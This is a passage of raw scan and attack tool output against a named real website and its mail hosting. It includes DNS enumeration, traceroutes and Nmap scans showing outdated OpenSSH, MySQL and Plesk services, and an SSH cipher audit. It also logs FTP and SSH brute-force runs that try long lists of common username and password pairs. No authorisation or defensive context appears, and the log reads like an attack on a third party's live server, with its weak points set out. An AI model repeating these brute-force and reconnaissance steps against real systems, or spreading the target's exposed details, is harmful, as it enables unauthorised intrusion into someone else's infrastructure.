1383 Port: 53/tcp open domain syn-ack ttl 56 ISC BIND
1384 Port: 873/tcp open rsync syn-ack ttl 56 (protocol version 31)
1385 IP: 217.76.156.128
1386 Type: SPF
1387 Is Active: True (reset ttl 64)
1388 IP: 217.76.148.0
1389 Type: SPF
1390 Is Active: True (reset ttl 64)
1391 IP: 217.76.156.0
1392 Type: SPF
1393 Is Active: True (reset ttl 64)
1394 IP: 82.223.251.0
1395 Type: SPF
1396 Is Active: True (reset ttl 64)
1397 IP: 217.76.130.0
1398 Type: SPF
1399 Is Active: True (reset ttl 64)
1400 IP: 217.76.132.128
1401 Type: SPF
1402 Is Active: True (reset ttl 64)
1403 IP: 82.223.56.0
1404 Type: SPF
1405 Is Active: True (reset ttl 64)
1406 IP: 82.223.190.234
1407 HostName: webmail.cazahispanica.com. Type: A
1408 Country: Spain
1409 Is Active: True (reset ttl 64)
1410 Port: 80/tcp open http syn-ack ttl 55 nginx
1411 Script Info: | http-methods:
1412 Script Info: |_ Supported Methods: GET HEAD POST OPTIONS
1413 Script Info: |_http-title: Did not follow redirect to https://serviciodecorreo.es/
1414 Port: 443/tcp open ssl/http syn-ack ttl 55 nginx
1415 Script Info: | http-methods:
1416 Script Info: |_ Supported Methods: GET HEAD POST
1417 Script Info: | http-robots.txt: 1 disallowed entry
1418 Script Info: |_/
1419 Script Info: |_http-title: Webmail :: Welcome to Webmail
1420 Script Info: | ssl-cert: Subject: commonName=*.serviciodecorreo.es/organizationName=Arsys Internet S.L.U./stateOrProvinceName=La Rioja/countryName=ES
1421 Script Info: | Subject Alternative Name: DNS:*.serviciodecorreo.es, DNS:serviciodecorreo.es
1422 Script Info: | Issuer: commonName=Thawte RSA CA 2018/organizationName=DigiCert Inc/countryName=US
1423 Script Info: | Public Key type: rsa
1424 Script Info: | Public Key bits: 2048
1425 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1426 Script Info: | Not valid before: 2018-04-03T00:00:00
1427 Script Info: | Not valid after: 2020-04-03T12:00:00
1428 Script Info: | MD5: 22c2 7e86 0420 22c3 1971 6285 22e9 2c4e
1429 Script Info: |_SHA-1: 1074 ed9e 57e8 e0ea c306 252e 0c74 ad7b ac1b 8e10
1430 Script Info: |_ssl-date: TLS randomness does not represent time
1431 Script Info: | tls-alpn:
1432 Script Info: |_ http/1.1
1433 Script Info: | tls-nextprotoneg:
1434 Script Info: |_ http/1.1
1435 Script Info: Running (JUST GUESSING): Linux 3.X|4.X (85%)
1436 IP: 82.223.190.0
1437 Type: SPF
1438 Is Active: True (reset ttl 64)
1439 IP: 82.223.190.100
1440 HostName: mx.serviciodecorreo.es Type: MX
1441 HostName: mx.serviciodecorreo.es Type: PTR
1442 Country: Spain
1443 Is Active: True (reset ttl 64)
1444
1445--------------End Summary --------------
1446-----------------------------------------
1447###################################################################################################################################
1448traceroute to www.cazahispanica.com (217.160.131.142), 30 hops max, 60 byte packets
1449 1 10.246.204.1 (10.246.204.1) 35.201 ms 35.181 ms 35.169 ms
1450 2 104.245.145.177 (104.245.145.177) 35.157 ms 35.143 ms 35.128 ms
1451 3 te0-1-1-9.219.ccr32.yyz02.atlas.cogentco.com (38.104.158.113) 35.114 ms 35.104 ms te0-0-2-1.225.nr11.b010988-1.yyz02.atlas.cogentco.com (38.104.156.9) 35.104 ms
1452 4 te0-0-0-1.agr13.yyz02.atlas.cogentco.com (154.24.54.37) 59.043 ms 59.023 ms te0-0-0-1.agr14.yyz02.atlas.cogentco.com (154.24.54.41) 58.983 ms
1453 5 toro-b3-link.telia.net (62.115.116.180) 34.997 ms 34.993 ms te0-9-0-9.ccr31.yyz02.atlas.cogentco.com (154.54.43.141) 34.980 ms
1454 6 * tinet.yyz02.atlas.cogentco.com (154.54.9.2) 60.268 ms 60.204 ms
1455 7 et-0-0-71.cr2-fra2.ip4.gtt.net (141.136.110.50) 130.267 ms ldn-bb3-link.telia.net (62.115.113.21) 130.166 ms et-0-0-71.cr2-fra2.ip4.gtt.net (141.136.110.50) 130.212 ms
1456 8 prs-bb3-link.telia.net (62.115.134.92) 152.096 ms 130.190 ms tinet-up.bb-a.fra3.fra.de.oneandone.net (213.200.65.202) 130.157 ms
1457 9 ae-14.bb-b.fr7.fra.de.oneandone.net (212.227.120.149) 152.074 ms ffm-bb3-link.telia.net (62.115.123.12) 152.158 ms 152.117 ms
145810 ae-9.bb-b.bs.kae.de.oneandone.net (212.227.120.168) 152.024 ms 181.699 ms ffm-b1-link.telia.net (62.115.121.5) 181.678 ms
145911 ionos-ic-350360-ffm-b1.c.telia.net (62.115.181.11) 181.626 ms 196.182 ms 196.123 ms
146012 ae-1.gw-prtr-a0110-a.kw.nbz.fr.oneandone.net (195.20.243.81) 196.015 ms * ae-9.bb-b.bs.kae.de.oneandone.net (212.227.120.168) 196.027 ms
146113 ae-2.gw-distp-a.kw.nbz.fr.oneandone.net (195.20.243.35) 196.019 ms * *
146214 ae-1.gw-prtr-a0110-a.kw.nbz.fr.oneandone.net (195.20.243.81) 195.894 ms * s18161039.onlinehome-server.info (217.160.131.142) 195.756 ms
1463###################################################################################################################################
1464----- cazahispanica.com -----
1465
1466
1467Host's addresses:
1468__________________
1469
1470cazahispanica.com. 3067 IN A 217.160.131.142
1471
1472
1473Name Servers:
1474______________
1475
1476dns47.servidoresdns.net. 3290 IN A 217.76.128.164
1477dns48.servidoresdns.net. 10644 IN A 82.223.218.164
1478
1479
1480Mail (MX) Servers:
1481___________________
1482
1483mx.serviciodecorreo.es. 3301 IN A 82.223.190.100
1484
1485
1486Brute forcing with /usr/share/dnsenum/dns.txt:
1487_______________________________________________
1488
1489webmail.cazahispanica.com. 2769 IN CNAME serviciodecorreo.es.
1490serviciodecorreo.es. 2769 IN A 82.223.190.234
1491www.cazahispanica.com. 2210 IN A 217.160.131.142
1492
1493
1494Launching Whois Queries:
1495_________________________
1496
1497 whois ip result: 217.160.131.0 -> 217.160.131.0/24
1498
1499
1500cazahispanica.com_________________
1501
1502 217.160.131.0/24
1503
1504###################################################################################################################################
1505Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 03:19 EST
1506Nmap scan report for s18161039.onlinehome-server.info (217.160.131.142)
1507Host is up (0.16s latency).
1508Not shown: 469 closed ports
1509PORT STATE SERVICE VERSION
151021/tcp open ftp ProFTPD
1511| ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
1512| Not valid before: 2015-01-27T11:06:14
1513|_Not valid after: 2016-01-27T11:06:14
1514|_ssl-date: 2020-01-05T08:19:43+00:00; -3s from scanner time.
1515| tls-nextprotoneg:
1516|_ ftp
151722/tcp open ssh OpenSSH 5.3 (protocol 2.0)
1518| ssh-hostkey:
1519| 1024 a8:a9:da:bc:cb:8d:0b:ee:5c:06:94:59:e9:e1:9e:6e (DSA)
1520|_ 2048 95:1e:62:e2:8f:bb:20:92:a7:f4:ab:a7:44:f6:37:f0 (RSA)
152180/tcp open http Apache httpd (PleskLin)
1522|_http-favicon: Parallels Control Panel
1523|_http-server-header: Apache
1524|_http-title: Domain Default page
1525443/tcp open ssl/http Apache httpd (PleskLin)
1526|_http-favicon: Parallels Control Panel
1527|_http-server-header: Apache
1528|_http-title: Domain Default page
1529| ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
1530| Not valid before: 2015-01-27T11:06:14
1531|_Not valid after: 2016-01-27T11:06:14
1532|_ssl-date: 2020-01-05T08:19:43+00:00; -3s from scanner time.
15333306/tcp open mysql MySQL 5.1.73
1534| mysql-info:
1535| Protocol: 10
1536| Version: 5.1.73
1537| Thread ID: 563845
1538| Capabilities flags: 63487
1539| Some Capabilities: LongColumnFlag, ConnectWithDatabase, SupportsCompression, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, LongPassword, SupportsTransactions, Support41Auth, FoundRows, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, ODBCClient, Speaks41ProtocolNew, InteractiveClient, SupportsLoadDataLocal
1540| Status: Autocommit
1541|_ Salt: f.N~Te"r=xft7Po^gke7
15428443/tcp open ssl/http sw-cp-server httpd (Plesk Onyx 17.8.11)
1543|_http-favicon: Parallels Plesk
1544| http-robots.txt: 1 disallowed entry
1545|_/
1546|_http-server-header: sw-cp-server
1547|_http-title: Plesk Onyx 17.8.11
1548| ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
1549| Not valid before: 2015-01-27T11:06:14
1550|_Not valid after: 2016-01-27T11:06:14
1551|_ssl-date: 2020-01-05T08:19:43+00:00; -3s from scanner time.
1552| tls-nextprotoneg:
1553|_ http/1.1
15548880/tcp open http sw-cp-server httpd (Plesk Onyx 17.8.11)
1555|_http-favicon: Parallels Plesk
1556| http-robots.txt: 1 disallowed entry
1557|_/
1558|_http-server-header: sw-cp-server
1559|_http-title: Plesk Onyx 17.8.11
1560Aggressive OS guesses: Linux 2.6.32 - 3.13 (95%), Linux 2.6.32 (94%), Linux 2.6.32 - 2.6.39 (94%), Linux 2.6.32 - 3.1 (94%), Linux 2.6.39 (94%), HP P2000 G3 NAS device (93%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.9 (92%), Linux 3.10 (92%), Linux 3.2 (92%)
1561No exact OS matches for host (test conditions non-ideal).
1562Network Distance: 15 hops
1563
1564Host script results:
1565|_clock-skew: mean: -3s, deviation: 0s, median: -3s
1566
1567TRACEROUTE (using port 443/tcp)
1568HOP RTT ADDRESS
15691 86.82 ms 10.246.204.1
15702 87.19 ms 104.245.145.177
15713 87.26 ms te0-1-1-9.219.ccr32.yyz02.atlas.cogentco.com (38.104.158.113)
15724 55.72 ms toro-b1-link.telia.net (62.115.168.48)
15735 137.31 ms te0-9-1-9.ccr31.yyz02.atlas.cogentco.com (154.54.43.161)
15746 105.41 ms tinet.yyz02.atlas.cogentco.com (154.54.9.2)
15757 199.05 ms et-0-0-71.cr2-fra2.ip4.gtt.net (141.136.110.50)
15768 199.03 ms tinet-up.bb-a.fra3.fra.de.oneandone.net (213.200.65.202)
15779 229.01 ms ae-10-0.bb-a.bap.rhr.de.oneandone.net (212.227.120.147)
157810 228.98 ms ffm-b1-link.telia.net (62.115.137.129)
157911 229.02 ms ae-1.gw-prtr-a0110-a.kw.nbz.fr.oneandone.net (195.20.243.81)
158012 229.01 ms ae-9.bb-b.bs.kae.de.oneandone.net (212.227.120.168)
158113 229.02 ms ae-2.gw-distp-a.kw.nbz.fr.oneandone.net (195.20.243.35)
158214 137.47 ms ae-1.gw-prtr-a0110-a.kw.nbz.fr.oneandone.net (195.20.243.81)
158315 193.03 ms s18161039.onlinehome-server.info (217.160.131.142)
1584###################################################################################################################################
1585Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 03:19 EST
1586Warning: 217.160.131.142 giving up on port because retransmission cap hit (2).
1587Nmap scan report for s18161039.onlinehome-server.info (217.160.131.142)
1588Host is up (0.16s latency).
1589Not shown: 22 closed ports, 2 filtered ports
1590Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
1591PORT STATE SERVICE VERSION
159267/udp open|filtered dhcps
159388/udp open|filtered kerberos-sec
1594123/udp open|filtered ntp
1595520/udp open|filtered route
1596Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1597Device type: WAP|broadband router|remote management
1598Running (JUST GUESSING): Aerohive HiveOS 6.X (96%), Arris embedded (96%), Linux 2.6.X (96%), Aruba ArubaOS 6.X (96%), Asus embedded (96%), AVM FritzOS 6.X (96%), Avocent embedded (96%), Belkin embedded (96%)
1599OS CPE: cpe:/o:aerohive:hiveos:6.1 cpe:/o:linux:linux_kernel:2.6.18 cpe:/h:arris:tg862 cpe:/o:arubanetworks:arubaos:6.4.2.6 cpe:/h:asus:rt-ac66u cpe:/o:avm:fritzos:6.20 cpe:/o:avm:fritzos:6.51 cpe:/h:belkin:n300
1600Aggressive OS guesses: Aerohive HiveOS 6.1 (96%), Arris cable modem (Linux 2.6.18) (96%), Arris TG862 WAP (96%), Aruba Instant AP (ArubaOS 6.4.2.6) (96%), Asus RT-AC66U router (Linux 2.6) (96%), AVM FRITZ!Box (FritzOS 6.20) (96%), AVM FRITZ!WLAN Repeater 450E (FritzOS 6.51) (96%), Avocent MergePoint Unity MPU2016DAC KVM switch (96%), Belkin N300 WAP (Linux 2.6.30) (96%), D-Link DIR-615, Encore 3G, or EnGenius ESR-9752 WAP (96%)
1601No exact OS matches for host (test conditions non-ideal).
1602Network Distance: 18 hops
1603
1604TRACEROUTE (using port 138/udp)
1605HOP RTT ADDRESS
16061 ... 8
16079 30.34 ms 10.246.204.1
160810 ... 11
160912 29.60 ms 10.246.204.1
161013 64.70 ms 10.246.204.1
161114 64.69 ms 10.246.204.1
161215 64.69 ms 10.246.204.1
161316 64.69 ms 10.246.204.1
161417 64.67 ms 10.246.204.1
161518 30.43 ms 10.246.204.1
161619 29.70 ms 10.246.204.1
161720 31.04 ms 10.246.204.1
161821 ... 27
161928 30.05 ms 10.246.204.1
162029 ...
162130 30.66 ms 10.246.204.1
1622####################################################################################################################################
1623Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 03:20 EST
1624NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
1625NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
1626NSE: [ftp-brute] passwords: Time limit 3m00s exceeded.
1627Nmap scan report for s18161039.onlinehome-server.info (217.160.131.142)
1628Host is up (0.16s latency).
1629
1630PORT STATE SERVICE VERSION
163121/tcp open ftp ProFTPD
1632| ftp-brute:
1633| Accounts: No valid accounts found
1634|_ Statistics: Performed 4281 guesses in 181 seconds, average tps: 22.9
1635Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1636Aggressive OS guesses: Linux 2.6.32 (95%), Linux 3.8 (95%), Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.13 (95%), Linux 2.6.32 - 3.9 (95%), Linux 3.2 (95%), Linux 2.6.32 - 3.1 (94%), Linux 3.1 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 - 2.6.39 (94%)
1637No exact OS matches for host (test conditions non-ideal).
1638Network Distance: 13 hops
1639
1640TRACEROUTE (using port 21/tcp)
1641HOP RTT ADDRESS
16421 52.35 ms 10.246.204.1
16432 83.83 ms 104.245.145.177
16443 63.24 ms te0-1-1-9.219.ccr32.yyz02.atlas.cogentco.com (38.104.158.113)
16454 71.35 ms toro-b1-link.telia.net (62.115.168.48)
16465 60.87 ms toro-b3-link.telia.net (62.115.116.180)
16476 101.57 ms nyk-bb2-link.telia.net (62.115.113.86)
16487 174.35 ms et-0-0-71.cr2-fra2.ip4.gtt.net (141.136.110.50)
16498 174.35 ms tinet-up.bb-a.fra3.fra.de.oneandone.net (213.200.65.202)
16509 174.40 ms ae-10-0.bb-a.bap.rhr.de.oneandone.net (212.227.120.147)
165110 174.42 ms ffm-b1-link.telia.net (62.115.121.5)
165211 174.41 ms ae-1.gw-prtr-a0110-a.kw.nbz.fr.oneandone.net (195.20.243.81)
165312 174.44 ms ae-9.bb-b.bs.kae.de.oneandone.net (212.227.120.168)
165413 174.44 ms s18161039.onlinehome-server.info (217.160.131.142)
1655###################################################################################################################################
1656# general
1657(gen) banner: SSH-2.0-OpenSSH_5.3
1658(gen) software: OpenSSH 5.3
1659(gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
1660(gen) compression: enabled (zlib@openssh.com)
1661
1662# key exchange algorithms
1663(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
1664 `- [info] available since OpenSSH 4.4
1665(kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1666 `- [warn] using weak hashing algorithm
1667 `- [info] available since OpenSSH 2.3.0
1668(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
1669 `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
1670(kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1671 `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
1672 `- [warn] using small 1024-bit modulus
1673 `- [warn] using weak hashing algorithm
1674 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
1675
1676# host-key algorithms
1677(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
1678(key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
1679 `- [warn] using small 1024-bit modulus
1680 `- [warn] using weak random number generator could reveal the key
1681 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
1682
1683# encryption algorithms (ciphers)
1684(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
1685(enc) aes192-ctr -- [info] available since OpenSSH 3.7
1686(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
1687(enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1688 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1689 `- [warn] using weak cipher
1690 `- [info] available since OpenSSH 4.2
1691(enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1692 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1693 `- [warn] using weak cipher
1694 `- [info] available since OpenSSH 4.2
1695(enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1696 `- [warn] using weak cipher mode
1697 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
1698(enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1699 `- [warn] using weak cipher
1700 `- [warn] using weak cipher mode
1701 `- [warn] using small 64-bit block size
1702 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
1703(enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1704 `- [fail] disabled since Dropbear SSH 0.53
1705 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1706 `- [warn] using weak cipher mode
1707 `- [warn] using small 64-bit block size
1708 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
1709(enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1710 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1711 `- [warn] using weak cipher mode
1712 `- [warn] using small 64-bit block size
1713 `- [info] available since OpenSSH 2.1.0
1714(enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1715 `- [warn] using weak cipher mode
1716 `- [info] available since OpenSSH 2.3.0
1717(enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1718 `- [warn] using weak cipher mode
1719 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
1720(enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1721 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1722 `- [warn] using weak cipher
1723 `- [info] available since OpenSSH 2.1.0
1724(enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1725 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1726 `- [warn] using weak cipher mode
1727 `- [info] available since OpenSSH 2.3.0
1728
1729# message authentication code algorithms
1730(mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1731 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1732 `- [warn] using encrypt-and-MAC mode
1733 `- [warn] using weak hashing algorithm
1734 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
1735(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
1736 `- [warn] using weak hashing algorithm
1737 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
1738(mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
1739 `- [warn] using small 64-bit tag size
1740 `- [info] available since OpenSSH 4.7
1741(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
1742 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
1743(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
1744 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
1745(mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1746 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1747 `- [warn] using encrypt-and-MAC mode
1748 `- [info] available since OpenSSH 2.5.0
1749(mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1750 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1751 `- [warn] using encrypt-and-MAC mode
1752 `- [info] available since OpenSSH 2.1.0
1753(mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1754 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1755 `- [warn] using encrypt-and-MAC mode
1756 `- [warn] using weak hashing algorithm
1757 `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
1758(mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1759 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1760 `- [warn] using encrypt-and-MAC mode
1761 `- [warn] using weak hashing algorithm
1762 `- [info] available since OpenSSH 2.5.0
1763
1764# algorithm recommendations (for OpenSSH 5.3)
1765(rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
1766(rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
1767(rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
1768(rec) -ssh-dss -- key algorithm to remove
1769(rec) -arcfour -- enc algorithm to remove
1770(rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
1771(rec) -blowfish-cbc -- enc algorithm to remove
1772(rec) -3des-cbc -- enc algorithm to remove
1773(rec) -aes256-cbc -- enc algorithm to remove
1774(rec) -arcfour256 -- enc algorithm to remove
1775(rec) -cast128-cbc -- enc algorithm to remove
1776(rec) -aes192-cbc -- enc algorithm to remove
1777(rec) -arcfour128 -- enc algorithm to remove
1778(rec) -aes128-cbc -- enc algorithm to remove
1779(rec) -hmac-md5-96 -- mac algorithm to remove
1780(rec) -hmac-ripemd160 -- mac algorithm to remove
1781(rec) -hmac-sha1-96 -- mac algorithm to remove
1782(rec) -umac-64@openssh.com -- mac algorithm to remove
1783(rec) -hmac-md5 -- mac algorithm to remove
1784(rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
1785(rec) -hmac-sha1 -- mac algorithm to remove
1786####################################################################################################################################
1787Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 03:24 EST
1788NSE: [ssh-run] Failed to specify credentials and command to run.
1872NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
1873NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
1874NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
1875NSE: [ssh-brute] Trying username/password pair: guest:12345678
1876NSE: [ssh-brute] Trying username/password pair: user:12345678
1877NSE: [ssh-brute] Trying username/password pair: web:12345678
1878NSE: [ssh-brute] Trying username/password pair: test:12345678
1879NSE: [ssh-brute] Trying username/password pair: root:1234567
1880NSE: [ssh-brute] Trying username/password pair: admin:1234567
1881NSE: [ssh-brute] Trying username/password pair: administrator:1234567
1882NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
1883NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
1884NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
1885NSE: [ssh-brute] Trying username/password pair: guest:1234567
1886NSE: [ssh-brute] Trying username/password pair: user:1234567
1887NSE: [ssh-brute] Trying username/password pair: web:1234567
1888NSE: [ssh-brute] Trying username/password pair: test:1234567
1889NSE: [ssh-brute] Trying username/password pair: root:abc123
1890NSE: [ssh-brute] Trying username/password pair: admin:abc123
1891NSE: [ssh-brute] Trying username/password pair: administrator:abc123
1892NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
1893NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
1894NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
1895NSE: [ssh-brute] Trying username/password pair: guest:abc123
1896NSE: [ssh-brute] Trying username/password pair: user:abc123
1897NSE: [ssh-brute] Trying username/password pair: web:abc123
1898NSE: [ssh-brute] Trying username/password pair: test:abc123
1899NSE: [ssh-brute] Trying username/password pair: root:nicole
1900NSE: [ssh-brute] Trying username/password pair: admin:nicole
1901NSE: [ssh-brute] Trying username/password pair: administrator:nicole
1902NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
1903NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
1904NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
1905NSE: [ssh-brute] Trying username/password pair: guest:nicole
1906NSE: [ssh-brute] Trying username/password pair: user:nicole
1907NSE: [ssh-brute] Trying username/password pair: web:nicole
1908NSE: [ssh-brute] Trying username/password pair: test:nicole
1909NSE: [ssh-brute] Trying username/password pair: root:daniel
1910NSE: [ssh-brute] Trying username/password pair: admin:daniel
1911NSE: [ssh-brute] Trying username/password pair: administrator:daniel
1912NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
1913NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
1914NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
1915NSE: [ssh-brute] Trying username/password pair: guest:daniel
1916NSE: [ssh-brute] Trying username/password pair: user:daniel
1917NSE: [ssh-brute] Trying username/password pair: web:daniel
1918NSE: [ssh-brute] Trying username/password pair: test:daniel
1919NSE: [ssh-brute] Trying username/password pair: root:monkey
1920NSE: [ssh-brute] Trying username/password pair: admin:monkey
1921NSE: [ssh-brute] Trying username/password pair: administrator:monkey
1922NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
1923NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
1924NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
1925NSE: [ssh-brute] Trying username/password pair: guest:monkey
1926NSE: [ssh-brute] Trying username/password pair: user:monkey
1927NSE: [ssh-brute] Trying username/password pair: web:monkey
1928NSE: [ssh-brute] Trying username/password pair: test:monkey
1929NSE: [ssh-brute] Trying username/password pair: root:babygirl
1930NSE: [ssh-brute] Trying username/password pair: admin:babygirl
1931NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
1932NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
1933NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
1934NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
1935NSE: [ssh-brute] Trying username/password pair: guest:babygirl
1936NSE: [ssh-brute] Trying username/password pair: user:babygirl
1937NSE: [ssh-brute] Trying username/password pair: web:babygirl
1938NSE: [ssh-brute] Trying username/password pair: test:babygirl
1939NSE: [ssh-brute] Trying username/password pair: root:qwerty
1940NSE: [ssh-brute] Trying username/password pair: admin:qwerty
1941NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
1942NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
1943NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
1944NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
1945NSE: [ssh-brute] Trying username/password pair: guest:qwerty
1946NSE: [ssh-brute] Trying username/password pair: user:qwerty
1947NSE: [ssh-brute] Trying username/password pair: web:qwerty
1948NSE: [ssh-brute] Trying username/password pair: test:qwerty
1949NSE: [ssh-brute] Trying username/password pair: root:lovely
1950NSE: [ssh-brute] Trying username/password pair: admin:lovely
1951NSE: [ssh-brute] Trying username/password pair: administrator:lovely
1952NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
1953NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
1954NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
1955NSE: [ssh-brute] Trying username/password pair: guest:lovely
1956NSE: [ssh-brute] Trying username/password pair: user:lovely
1957NSE: [ssh-brute] Trying username/password pair: web:lovely
1958NSE: [ssh-brute] Trying username/password pair: test:lovely
1959NSE: [ssh-brute] Trying username/password pair: root:654321
1960NSE: [ssh-brute] Trying username/password pair: admin:654321
1961NSE: [ssh-brute] Trying username/password pair: administrator:654321
1962NSE: [ssh-brute] Trying username/password pair: webadmin:654321
1963NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
1964NSE: [ssh-brute] Trying username/password pair: netadmin:654321
1965NSE: [ssh-brute] Trying username/password pair: guest:654321
1966NSE: [ssh-brute] Trying username/password pair: user:654321
1967NSE: [ssh-brute] Trying username/password pair: web:654321
1968NSE: [ssh-brute] Trying username/password pair: test:654321
1969NSE: [ssh-brute] Trying username/password pair: root:michael
1970NSE: [ssh-brute] Trying username/password pair: admin:michael
1971NSE: [ssh-brute] Trying username/password pair: administrator:michael
1972NSE: [ssh-brute] Trying username/password pair: webadmin:michael
1973NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
1974NSE: [ssh-brute] Trying username/password pair: netadmin:michael
1975NSE: [ssh-brute] Trying username/password pair: guest:michael
1976NSE: [ssh-brute] Trying username/password pair: user:michael
1977NSE: [ssh-brute] Trying username/password pair: web:michael
1978NSE: [ssh-brute] Trying username/password pair: test:michael
1979NSE: [ssh-brute] Trying username/password pair: root:jessica
1980NSE: [ssh-brute] Trying username/password pair: admin:jessica
1981NSE: [ssh-brute] Trying username/password pair: administrator:jessica
1982NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
1983NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
